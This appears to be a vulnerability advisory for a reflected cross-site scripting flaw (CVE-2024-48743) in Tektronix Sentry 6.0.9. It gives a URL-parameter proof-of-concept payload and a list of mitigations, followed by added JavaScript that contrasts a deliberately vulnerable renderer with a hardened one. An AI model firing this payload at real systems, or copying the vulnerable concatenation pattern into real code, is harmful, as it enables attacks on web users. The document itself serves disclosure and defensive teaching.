Created October 19, 2024 17:48
Product : Tektronix Sentry
CVE : CVE-2024-48743
Version : 6.0.9
Vulnerability : Cross Site Scripting
Vulnerability Description : Cross Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious code into a website or web application. It allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.
#Steps to Reproduce
1). Navigate to - http://IP/?page=reports&_z=0&
2). The "z" parameter (`_z` in the URL) is vulnerable. Remove "0" and insert the query "ysguo%27-alert(1)-%27jf151=1"
3). http://IP/?page=reports&_z=ysguo%27-alert(1)-%27jf151=1&
Mitigation:
1). Secure handling of user input
2). Escaping
3). Use appropriate response headers
4). Encode data on output
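
The four mitigations applied together, as an added example that is not part of the original advisory and is not Tektronix code. It assumes, from the shape of the test string (quote, expression, quote), that the "_z" value was reflected inside a single-quoted JavaScript string; the function names, the digits-only rule and the markup are hypothetical.

```javascript
// Added example. Assumption: "_z" was reflected inside a single-quoted JS string.
const PAYLOAD = decodeURIComponent("ysguo%27-alert(1)-%27jf151=1"); // value from the report

// The 'before' pattern (hypothetical): raw concatenation into a script string.
function renderVulnerable(z) {
  return "<script>var z = '" + z + "';</script>";
}

// Mitigation 1, input handling: the legitimate value shown is "0",
// so this sketch accepts digits only (an assumption about the parameter).
function parseZ(raw) {
  return /^[0-9]{1,9}$/.test(String(raw)) ? Number(raw) : null;
}

// Mitigations 2 and 4, context-aware encoding.
// JS string context: JSON.stringify quotes and backslash-escapes the value; the
// replace then \uXXXX-escapes characters that could end the string or the script element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&'\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// HTML text and attribute context: numeric character references.
function htmlEscape(value) {
  return String(value).replace(/[&<>"']/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Mitigation 3, response headers. The hardened page keeps the value out of
// inline script entirely (data attribute), so the CSP can forbid inline script.
function renderHardened(rawZ) {
  const headers = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
  };
  const z = parseZ(rawZ);
  if (z === null) {
    return { status: 400, headers, body: "<p>Invalid _z: " + htmlEscape(rawZ) + "</p>" };
  }
  return { status: 200, headers, body: '<div id="report" data-z="' + htmlEscape(z) + '"></div>' };
}
```

`jsStringLiteral` is for code paths that must still place a value inside a script block; the hardened renderer avoids that context altogether.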